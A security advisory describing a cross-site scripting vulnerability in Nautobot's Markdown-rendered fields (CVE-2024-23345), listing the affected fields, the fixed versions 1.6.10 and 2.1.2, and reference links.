HIGH 7.1 PyPI
XSS potential in rendered Markdown fields (comments, description, notes, etc.)
GHSA-v4xv-795h-rv4h · CVE-2024-23345 · PYSEC-2024-16
Published · Modified
Description
Impact
All users of Nautobot versions earlier than 1.6.10 or 2.1.2 are potentially impacted.
Due to inadequate input sanitization, any user-editable fields that support Markdown rendering, including:
Circuit.commentsCluster.commentsCustomField.descriptionDevice.commentsDeviceRedundancyGroup.commentsDeviceType.commentsJob.descriptionJobLogEntry.messageLocation.commentsNote.notePowerFeed.commentsProvider.noc_contactProvider.admin_contactProvider.commentsProviderNetwork.commentsRack.commentsTenant.commentsVirtualMachine.comments- Contents of any custom fields of type
markdown - Job class
descriptionattributes - The
SUPPORT_MESSAGEsystem configuration setting
are potentially susceptible to cross-site scripting (XSS) attacks via maliciously crafted data.
Patches
Fixed in Nautobot versions 1.6.10 and 2.1.2.
References
https://github.com/nautobot/nautobot/pull/5133
https://github.com/nautobot/nautobot/pull/5134
References
- WEB https://github.com/nautobot/nautobot/security/advisories/GHSA-v4xv-795h-rv4h
- ADVISORY https://nvd.nist.gov/vuln/detail/CVE-2024-23345
- WEB https://github.com/nautobot/nautobot/pull/5133
- WEB https://github.com/nautobot/nautobot/pull/5134
- WEB https://github.com/nautobot/nautobot/commit/17effcbe84a72150c82b138565c311bbee357e80
- WEB https://github.com/nautobot/nautobot/commit/64312a4297b5ca49b6cdedf477e41e8e4fd61cce
- PACKAGE https://github.com/nautobot/nautobot
- WEB https://github.com/pypa/advisory-database/tree/main/vulns/nautobot/PYSEC-2024-16.yaml
Ready to move
Start Securing
Free, no credit card | First findings in minutes